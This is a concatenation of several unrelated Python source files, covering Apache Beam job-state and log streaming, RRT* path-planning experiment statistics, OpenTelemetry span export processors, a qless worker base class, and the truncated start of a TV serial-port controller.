super(BeamJob, self).__init__(
job_id, provision_info.provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
try:
result = fn_api_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
        _LOGGER.exception('Error running pipeline.')
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime('%Y-%m-%d %H:%M:%S.',
time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
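# Hedged usage sketch (illustrative): JobLogHandler forwards log records emitted
# by the current thread to the given queues while the 'with' block is active.
#
#   log_queue = queue.Queue()
#   with JobLogHandler([log_queue]):
#       _LOGGER.info('visible to Job API message consumers')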
|
utils.py
|
import os
import re
import numpy as np
import pandas as pd
from typing import Tuple, List, Union, Optional, Iterable
from collections import defaultdict, OrderedDict
from PIL import Image
from tqdm import tqdm
from functools import reduce
import operator
import multiprocessing
import json
from itertools import product
import path
from path.rrt_base import RRTBase, PathDescription
from path.rrt_star import RRTStar
class Report(object):
def __init__(self, map_name: str):
self.map_name = map_name
self.first = defaultdict(list)
self.best = defaultdict(list)
self.costs = []
self.path_lengths = []
self.pad_len = 0
self.samples_taken = []
self.nodes_taken = []
def update(self,
first_path: PathDescription,
best_path: PathDescription,
costs: List[float], paths: List[int],
samples: List[int], nodes: List[int]):
best_dict = best_path()
for ct_name, ct_value in first_path().items():
if ct_name != 'path':
self.first[ct_name].append(ct_value)
self.best[ct_name].append(best_dict[ct_name])
self.pad_len = max(self.pad_len, len(costs))
self.costs.append(costs)
self.path_lengths.append(paths)
self.samples_taken.append(samples)
self.nodes_taken.append(nodes)
@staticmethod
def get_mean_std(a: np.ndarray, axis: int = 0):
mu = np.nanmean(a, axis=axis)
std = np.nanstd(a, axis=axis)
return mu.tolist(), std.tolist()
def __call__(self):
for i in range(len(self.costs)):
l = self.pad_len - len(self.costs[i])
if l > 0:
self.costs[i].extend([np.nan] * l)
self.path_lengths[i].extend([np.nan] * l)
if not isinstance(self.costs, np.ndarray):
self.costs = np.vstack(self.costs)
self.path_lengths = np.vstack(self.path_lengths)
self.samples_taken = np.array(self.samples_taken)
self.nodes_taken = np.array(self.nodes_taken)
mean_costs, std_costs = self.get_mean_std(self.costs)
mean_paths, std_paths = self.get_mean_std(self.path_lengths)
mean_samples, std_samples = self.get_mean_std(self.samples_taken)
mean_nodes, std_nodes = self.get_mean_std(self.nodes_taken)
report_dict = {'map_name': self.map_name,
'first': self.first,
'best': self.best,
'costs': {'mean': mean_costs, 'std': std_costs},
'paths': {'mean': mean_paths, 'std': std_paths},
'samples': {'mean': mean_samples, 'std': std_samples},
'nodes': {'mean': mean_nodes, 'std': std_nodes}
}
return report_dict
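# Illustrative flow (hedged; the per-run arguments come from an RRT run and are
# not defined here): a Report is updated once per seeded run, then called to
# obtain padded and averaged statistics.
#
#   report = Report('map_0.png')
#   report.update(first_path, best_path, costs, paths, samples, nodes)  # per run
#   report_dict = report()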
def get_n_results(data_folder: str = '../data',
results_folder: str = 'results',
results_file: str = 'result.csv') -> int:
results_file = os.path.join(data_folder, results_folder, results_file)
roi_description = pd.read_csv(results_file, header=None)
return roi_description.shape[0] - 1
def process_all_results(map_params: dict,
rrt_params: dict,
mu: float = 0.1,
gamma: float = 10.,
n: int = 50,
output_dir: str = 'logs',
output_fname: str = 'logs.txt'):
seen_maps = set()
n_results = get_n_results(map_params['data_folder'],
map_params['results_folder'],
map_params['results_file'])
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_path = os.path.join(output_dir, output_fname)
with tqdm(total=n_results) as pbar:
with open(output_path, 'w') as f:
for i in range(n_results):
map_params['result_row_id'] = i
out = get_map_and_task(**map_params)
                map_name = os.path.basename(out['grid_map'])
if map_name in seen_maps:
continue
pbar.write('Processing map {}...'.format(map_name))
seen_maps.add(map_name)
data = {
'grid_map': process_image(out['grid_map']),
'xy_init': out['xy_init'],
'xy_goal': out['xy_goal'],
'dist_init_goal': out['euclid']
}
roi_data = {'roi': roi_from_image(out['pred_roi']),
'mu': mu}
rewire_params = {'gamma': gamma}
report1 = run_experiment(map_name, RRTStar,
{**data, **rrt_params, **rewire_params}, n)
report2 = run_experiment(map_name, RRTStar,
{**data, **rrt_params, **roi_data, **rewire_params}, n)
f.write(json.dumps(report1))
f.write('\n')
f.write(json.dumps(report2))
f.write('\n')
pbar.update(1)
def get_map_and_task(data_folder: str = '../data',
maps_folder: str = 'maps',
results_folder: str = 'results',
results_file: str = 'result.csv',
result_row_id: int = 0) -> dict:
results_file = os.path.join(data_folder, results_folder, results_file)
roi_description = pd.read_csv(results_file, header=None,
skiprows=result_row_id + 1, nrows=1)
true_roi = roi_description.iloc[0, 0]
pred_roi = re.split('[\\\\/]', roi_description.iloc[0, 1])
if len(pred_roi) == 3:
pred_roi = pred_roi[2]
else:
pred_roi = pred_roi[1]
dataset_folder, tasks_folder, map_name, task_roi_name = re.split('[\\\\/]', true_roi)
map_path = os.path.join(data_folder,
dataset_folder,
maps_folder,
map_name + '.png')
task_path = os.path.join(data_folder,
dataset_folder,
tasks_folder,
map_name + '.csv')
task_idx = int(task_roi_name.split('_')[1])
task_description = pd.read_csv(task_path, header=None,
skiprows=task_idx + 1, nrows=1).values.tolist()[0]
x0, y0, x1, y1 = list(map(int, task_description[:-1]))
euclid = task_description[-1]
true_roi_path = os.path.join(data_folder, dataset_folder,
tasks_folder, map_name, task_roi_name)
pred_roi_path = os.path.join(data_folder, results_folder, pred_roi)
return {'grid_map': map_path,
'true_roi': true_roi_path,
'pred_roi': pred_roi_path,
'xy_init': (x0, y0),
'xy_goal': (x1, y1),
'euclid': euclid}
def rgb2binary(img: np.ndarray) -> np.ndarray:
    return (img > 150).astype(float)
def process_image(load_dir: str) -> np.ndarray:
img = Image.open(load_dir).convert('RGB')
data = rgb2binary(np.array(img))
return data
def roi_from_image(load_dir: str) -> List[Tuple[int, int]]:
roi_data = process_image(load_dir)
mask = roi_data[..., 0] * roi_data[..., 2]
roi = list(zip(*np.where(mask == 0)))
return roi
def wrapper(algo: RRTBase, proc_num: int, return_dict: dict):
algo.run()
return_dict[proc_num] = algo
def run_experiment(map_name: str, algorithm: RRTBase, params: dict, n: int = 50):
report = Report(map_name)
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for seed in range(n):
params['seed'] = seed
algo = algorithm(**params)
p = multiprocessing.Process(target=wrapper, args=(algo, seed, return_dict))
jobs.append(p)
p.start()
with tqdm(total=n) as pbar:
for p in jobs:
p.join()
pbar.update(1)
for algo in return_dict.values():
report.update(algo.first_path,
algo.best_path,
algo.costs_history,
algo.path_lengths_history,
algo.samples_taken_history,
algo.nodes_taken_history)
return report()
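# Hedged usage sketch (illustrative; 'data' and 'rrt_params' are the dicts
# assembled in process_all_results above, not defined here):
#
#   stats = run_experiment('map_0.png', RRTStar, {**data, **rrt_params}, n=50)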
def get_by_keys(log_dict: dict,
keys: list) -> Union[Iterable, dict]:
return reduce(operator.getitem, keys, log_dict)
def set_by_keys(log_dict: dict,
keys: list):
value = get_by_keys(log_dict, keys[:-1])[keys[-1]]
get_by_keys(log_dict, keys[:-1])[keys[-1]] = [value]
def rename(name: str, pattern: str):
pattern = re.compile(pattern)
num = re.findall(pattern, name)[0]
name = name.replace(num, str(int(num) // 10)).split('.')[0]
return name
def collect_stats_by_maps(log_dir: str,
log_file: str,
pattern: Optional[str] = None):
seen_maps = set()
log_dict_rrt_s = OrderedDict()
log_dict_rrt_s_h = OrderedDict()
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s_dict = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h_dict = json.loads(f.readline().rstrip('\n'))
map_name = rrt_s_dict['map_name']
if pattern is not None:
map_name = rename(map_name, pattern)
del rrt_s_dict['map_name']
del rrt_s_h_dict['map_name']
if map_name not in seen_maps:
seen_maps.add(map_name)
for key in rrt_s_dict:
for key_ in rrt_s_dict[key]:
rrt_s_dict[key][key_] = [rrt_s_dict[key][key_]]
rrt_s_h_dict[key][key_] = [rrt_s_h_dict[key][key_]]
log_dict_rrt_s[map_name] = rrt_s_dict
log_dict_rrt_s_h[map_name] = rrt_s_h_dict
else:
for key in rrt_s_dict:
for key_ in rrt_s_dict[key]:
log_dict_rrt_s[map_name][key][key_].append(rrt_s_dict[key][key_])
log_dict_rrt_s_h[map_name][key][key_].append(rrt_s_h_dict[key][key_])
for map_name in log_dict_rrt_s:
for key in log_dict_rrt_s[map_name]:
for key_ in log_dict_rrt_s[map_name][key]:
# list of lists, get mean
counts = log_dict_rrt_s[map_name][key][key_]
counts_h = log_dict_rrt_s_h[map_name][key][key_]
# for padding
l = max(map(lambda x: len(x), counts))
l_h = max(map(lambda x: len(x), counts_h))
for i, lst in enumerate(counts):
cur_l = l - len(lst)
if cur_l > 0:
counts[i] = lst + [np.nan] * cur_l
for i, lst in enumerate(counts_h):
cur_l = l_h - len(lst)
if cur_l > 0:
counts_h[i] = lst + [np.nan] * cur_l
counts = np.array(np.vstack(counts)).astype(float)
counts_h = np.array(np.vstack(counts_h)).astype(float)
counts[counts == float('inf')] = np.nan
counts_h[counts_h == float('inf')] = np.nan
counts = np.nanmean(counts, axis=0).tolist()
counts_h = np.nanmean(counts_h, axis=0).tolist()
log_dict_rrt_s[map_name][key][key_] = counts
log_dict_rrt_s_h[map_name][key][key_] = counts_h
output_filename = os.path.join(log_dir, '_'.join(['collected_stats', log_file]))
with open(output_filename, 'w') as f:
for map_name in log_dict_rrt_s:
map_dict = {'map_name': map_name}
rrt_s_dict = {**map_dict, **log_dict_rrt_s[map_name]}
f.write(json.dumps(rrt_s_dict))
f.write('\n')
rrt_s_h_dict = {**map_dict, **log_dict_rrt_s_h[map_name]}
f.write(json.dumps(rrt_s_h_dict))
f.write('\n')
return output_filename
def get_stats_table(map_name: str,
pad_len: int,
counts: list):
map_name = [map_name.split('.')[0]] * 2 * pad_len
algo_type = ['RRT*-uniform'] * pad_len + ['RRT*-ROI'] * pad_len
return np.vstack((map_name, algo_type, counts))
def get_stats_table_by_keys(log_dir: str,
log_file: str,
keys: List[str],
csv_name: str):
tables = []
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h = json.loads(f.readline().rstrip('\n'))
stats_s = get_by_keys(rrt_s, keys)
stats_s_h = get_by_keys(rrt_s_h, keys)
map_name = rrt_s['map_name'].split('.')[0]
table = get_stats_table(map_name, len(stats_s), stats_s + stats_s_h)
tables.append(table)
tables = np.hstack(tables).T
df = pd.DataFrame(tables, columns=['map_name', 'algo_type', 'counts'])
df[['counts']] = df[['counts']].astype(float)
df.to_csv(os.path.join(log_dir, csv_name))
return df
def get_plot_data_by_keys(log_dir: str,
log_file: str,
keys: List[str]) -> dict:
plot_data = {}
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h = json.loads(f.readline().rstrip('\n'))
data = get_by_keys(rrt_s, keys)
data_h = get_by_keys(rrt_s_h, keys)
map_name = rrt_s['map_name'].split('.')[0]
plot_data[map_name] = {'uniform': data, 'roi': data_h}
return plot_data
def csv_and_plots_from_logs(log_dir: str,
log_file: str,
collect_stats: bool = False,
                            pattern: str = r'\d+'):
if collect_stats:
_, log_file = os.path.split(collect_stats_by_maps(log_dir, log_file, pattern))
prefix = '_'.join(log_file.split('_')[:-1])
for path_type, metric_name in product(path.PATH_TYPES, path.PATH_METRICS_KEYS):
csv_name = f'{prefix}_{path_type}_{metric_name}.csv'
get_stats_table_by_keys(log_dir, log_file, [path_type, metric_name], csv_name)
for metric_name in path.RUNS_METRICS:
plot_data = get_plot_data_by_keys(log_dir, log_file, [metric_name])
plot_file = f'{prefix}_{metric_name}.plot'
output = os.path.join(log_dir, plot_file)
with open(output, 'w') as f:
f.write(json.dumps(plot_data))
f.write('\n')
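# Hedged usage sketch (illustrative; paths mirror the defaults used by
# process_all_results above): collect per-map statistics first, then dump the
# CSV tables and plot data next to the raw logs.
#
#   csv_and_plots_from_logs('logs', 'logs.txt', collect_stats=True)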
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import os
import sys
import threading
import typing
from enum import Enum
from opentelemetry.configuration import Configuration
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.util import time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILURE = 1
class SpanExporter:
"""Interface for exporting spans.
    Interface to be implemented by services that want to export spans recorded
    in their own format.
    To export data this MUST be registered to the :class:`opentelemetry.sdk.trace.Tracer` using a
    `SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if not span.context.trace_flags.sampled:
return
token = attach(set_value("suppress_instrumentation", True))
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
detach(token)
def shutdown(self) -> None:
self.span_exporter.shutdown()
def force_flush(self, timeout_millis: int = 30000) -> bool:
# pylint: disable=unused-argument
return True
class _FlushRequest:
"""Represents a request for the BatchExportSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchExportSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
BatchExportSpanProcessor is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
"""
def __init__(
self,
span_exporter: SpanExporter,
        max_queue_size: typing.Optional[int] = None,
        schedule_delay_millis: typing.Optional[float] = None,
        max_export_batch_size: typing.Optional[int] = None,
        export_timeout_millis: typing.Optional[float] = None,
):
if max_queue_size is None:
max_queue_size = Configuration().get("BSP_MAX_QUEUE_SIZE", 2048)
if schedule_delay_millis is None:
schedule_delay_millis = Configuration().get(
"BSP_SCHEDULE_DELAY_MILLIS", 5000
)
if max_export_batch_size is None:
max_export_batch_size = Configuration().get(
"BSP_MAX_EXPORT_BATCH_SIZE", 512
)
if export_timeout_millis is None:
export_timeout_millis = Configuration().get(
"BSP_EXPORT_TIMEOUT_MILLIS", 30000
)
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than or equal to max_queue_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self._flush_request = None # type: typing.Optional[_FlushRequest]
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.export_timeout_millis = export_timeout_millis
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
        # preallocated list to send spans to the exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
if not span.context.trace_flags.sampled:
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logger.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_queue_size // 2:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
flush_request = None # type: typing.Optional[_FlushRequest]
while not self.done:
with self.condition:
if self.done:
# done flag may have changed, avoid waiting
break
flush_request = self._get_and_unset_flush_request()
if (
len(self.queue) < self.max_export_batch_size
and flush_request is None
):
self.condition.wait(timeout)
flush_request = self._get_and_unset_flush_request()
if not self.queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
self._notify_flush_request_finished(flush_request)
flush_request = None
continue
if self.done:
# missing spans will be sent when calling flush
break
            # subtract the duration of this export call from the next timeout
start = time_ns()
self._export(flush_request)
end = time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
self._notify_flush_request_finished(flush_request)
flush_request = None
# there might have been a new flush request while export was running
# and before the done flag switched to true
with self.condition:
shutdown_flush_request = self._get_and_unset_flush_request()
# be sure that all spans are sent
self._drain_queue()
self._notify_flush_request_finished(flush_request)
self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
flush_request: typing.Optional[_FlushRequest],
):
"""Notifies the flush initiator(s) waiting on the given request/event
that the flush operation was finished.
"""
if flush_request is not None:
flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
"""Either returns the current active flush event or creates a new one.
The flush event will be visible and read by the worker thread before an
export operation starts. Callers of a flush operation may wait on the
returned event to be notified when the flush/export operation was
finished.
This method is not thread-safe, i.e. callers need to take care about
synchronization/locking.
"""
if self._flush_request is None:
self._flush_request = _FlushRequest()
return self._flush_request
def _export(self, flush_request: typing.Optional[_FlushRequest]):
"""Exports spans considering the given flush_request.
        If a flush_request is given, spans are exported in batches until the
        number of exported spans reaches or exceeds the number of spans in the
        flush request.
        If no flush_request is given, at most max_export_batch_size spans are
        exported.
"""
if not flush_request:
self._export_batch()
return
num_spans = flush_request.num_spans
while self.queue:
num_exported = self._export_batch()
num_spans -= num_exported
if num_spans <= 0:
break
def _export_batch(self) -> int:
"""Exports at most max_export_batch_size spans and returns the number of
exported spans.
"""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
token = attach(set_value("suppress_instrumentation", True))
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.spans_list[:idx]) # type: ignore
except Exception: # pylint: disable=broad-except
logger.exception("Exception while exporting Span batch.")
detach(token)
# clean up list
for index in range(idx):
self.spans_list[index] = None
return idx
def _drain_queue(self):
""""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.queue:
self._export_batch()
    def force_flush(self, timeout_millis: typing.Optional[int] = None) -> bool:
if timeout_millis is None:
timeout_millis = self.export_timeout_millis
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
with self.condition:
flush_request = self._get_or_create_flush_request()
# signal the worker thread to flush and wait for it to finish
self.condition.notify_all()
# wait for token to be processed
ret = flush_request.event.wait(timeout_millis / 1e3)
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
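# Hedged usage sketch (illustrative): the batching processor exports on a timer,
# when the queue reaches half of max_queue_size, and on force_flush()/shutdown().
#
#   processor = BatchExportSpanProcessor(
#       ConsoleSpanExporter(), schedule_delay_millis=1000)
#   ...
#   processor.force_flush()  # blocks until queued spans are exported or timeout
#   processor.shutdown()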
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def __init__(
self,
out: typing.IO = sys.stdout,
formatter: typing.Callable[[Span], str] = lambda span: span.to_json()
+ os.linesep,
):
self.out = out
self.formatter = formatter
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
self.out.write(self.formatter(span))
self.out.flush()
return SpanExportResult.SUCCESS
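# Hedged usage sketch (illustrative): the formatter argument controls how each
# span is rendered; the lambda below is an example, not a library default.
#
#   exporter = ConsoleSpanExporter(
#       formatter=lambda span: span.name + os.linesep)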
|
__init__.py
|
#! /usr/bin/env python
'''Our base worker'''
from __future__ import print_function
import os
import code
import signal
import shutil
import sys
import traceback
import threading
from contextlib import contextmanager
from six import string_types
from six.moves import zip_longest
# Internal imports
from qless.listener import Listener
from qless import logger, exceptions
# Try to use the fast json parser
try:
import simplejson as json
except ImportError: # pragma: no cover
import json
# Setting the process title
try:
from setproctitle import setproctitle, getproctitle
except ImportError: # pragma: no cover
def setproctitle(title):
pass
def getproctitle():
return ''
class Worker(object):
'''Worker. For doing work'''
@classmethod
def title(cls, message=None):
'''Set the title of the process'''
        if message is None:
return getproctitle()
else:
setproctitle('qless-py-worker %s' % message)
logger.info(message)
@classmethod
def divide(cls, jobs, count):
'''Divide up the provided jobs into count evenly-sized groups'''
jobs = list(zip(*zip_longest(*[iter(jobs)] * count)))
# If we had no jobs to resume, then we get an empty list
jobs = jobs or [()] * count
for index in range(count):
# Filter out the items in jobs that are Nones
            jobs[index] = [j for j in jobs[index] if j is not None]
return jobs
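    # Illustrative example (hedged, not executed): six jids divided among three
    # workers are dealt round-robin into equal groups, e.g.
    #   Worker.divide(['a', 'b', 'c', 'd', 'e', 'f'], 3)
    #   -> [['a', 'd'], ['b', 'e'], ['c', 'f']]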
@classmethod
def clean(cls, path):
'''Clean up all the files in a provided path'''
for pth in os.listdir(path):
pth = os.path.abspath(os.path.join(path, pth))
if os.path.isdir(pth):
logger.debug('Removing directory %s' % pth)
shutil.rmtree(pth)
else:
logger.debug('Removing file %s' % pth)
os.remove(pth)
@classmethod
@contextmanager
def sandbox(cls, path):
'''Ensures path exists before yielding, cleans up after'''
# Ensure the path exists and is clean
try:
os.makedirs(path)
logger.debug('Making %s' % path)
except OSError:
if not os.path.isdir(path):
raise
finally:
cls.clean(path)
# Then yield, but make sure to clean up the directory afterwards
try:
yield
finally:
cls.clean(path)
def __init__(self, queues, client, **kwargs):
self.client = client
# This should accept either queue objects, or string queue names
self.queues = []
for queue in queues:
if isinstance(queue, string_types):
self.queues.append(self.client.queues[queue])
else:
self.queues.append(queue)
        # Save our kwargs, since it's a common pattern to pass them along when
        # instantiating subworkers
self.kwargs = kwargs
# Check for any jobs that we should resume. If 'resume' is the actual
# value 'True', we should find all the resumable jobs we can. Otherwise,
# we should interpret it as a list of jobs already
self.resume = kwargs.get('resume') or []
        if self.resume is True:
self.resume = self.resumable()
# How frequently we should poll for work
self.interval = kwargs.get('interval', 60)
# To mark whether or not we should shutdown after work is done
self.shutdown = False
def resumable(self):
'''Find all the jobs that we'd previously been working on'''
# First, find the jids of all the jobs registered to this client.
# Then, get the corresponding job objects
jids = self.client.workers[self.client.worker_name]['jobs']
jobs = self.client.jobs.get(*jids)
# We'll filter out all the jobs that aren't in any of the queues
# we're working on.
queue_names = set([queue.name for queue in self.queues])
return [job for job in jobs if job.queue_name in queue_names]
def jobs(self):
'''Generator for all the jobs'''
# If we should resume work, then we should hand those out first,
# assuming we can still heartbeat them
for job in self.resume:
try:
if job.heartbeat():
yield job
except exceptions.LostLockException:
logger.exception('Cannot resume %s' % job.jid)
while True:
seen = False
for queue in self.queues:
job = queue.pop()
if job:
seen = True
yield job
if not seen:
yield None
@contextmanager
def listener(self):
'''Listen for pubsub messages relevant to this worker in a thread'''
channels = ['ql:w:' + self.client.worker_name]
listener = Listener(self.client.redis, channels)
thread = threading.Thread(target=self.listen, args=(listener,))
thread.start()
try:
yield
finally:
listener.unlisten()
thread.join()
def listen(self, listener):
'''Listen for events that affect our ownership of a job'''
for message in listener.listen():
try:
data = json.loads(message['data'])
if data['event'] in ('canceled', 'lock_lost', 'put'):
self.kill(data['jid'])
except:
logger.exception('Pubsub error')
def kill(self, jid):
'''Stop processing the provided jid'''
raise NotImplementedError('Derived classes must override "kill"')
def signals(self, signals=('QUIT', 'USR1', 'USR2')):
'''Register our signal handler'''
for sig in signals:
signal.signal(getattr(signal, 'SIG' + sig), self.handler)
def stop(self):
'''Mark this for shutdown'''
self.shutdown = True
# Unfortunately, for most of this, it's not really practical to unit test
def handler(self, signum, frame): # pragma: no cover
'''Signal handler for this process'''
if signum == signal.SIGQUIT:
# QUIT - Finish processing, but don't do any more work after that
self.stop()
elif signum == signal.SIGUSR1:
# USR1 - Print the backtrace
message = ''.join(traceback.format_stack(frame))
message = 'Signaled traceback for %s:\n%s' % (os.getpid(), message)
print(message, file=sys.stderr)
            logger.warning(message)
elif signum == signal.SIGUSR2:
# USR2 - Enter a debugger
# Much thanks to http://stackoverflow.com/questions/132058
data = {'_frame': frame} # Allow access to frame object.
data.update(frame.f_globals) # Unless shadowed by global
data.update(frame.f_locals)
# Build up a message with a traceback
message = ''.join(traceback.format_stack(frame))
message = 'Traceback:\n%s' % message
code.InteractiveConsole(data).interact(message)
|
tv_serial.py
|
import time, serial, threading
class TvSerial:
@staticmethod
def handler(signum, frame):
raise Exception("Serial connection timeout")
@staticmethod
def writeCommandAsync(command):
thread = threading.Thread(target=TvSerial.writeCommand, args=(command,))
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
return "This is fine ¯\_(ツ)_/¯"
@staticmethod
def writeCommand(command):
print("Will execute: " + command)
try:
            # configure the serial connection (the parameters differ depending on the device you are connecting to)
ser = serial.Serial(port='/dev/ttyUSB0', baudrate=9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)
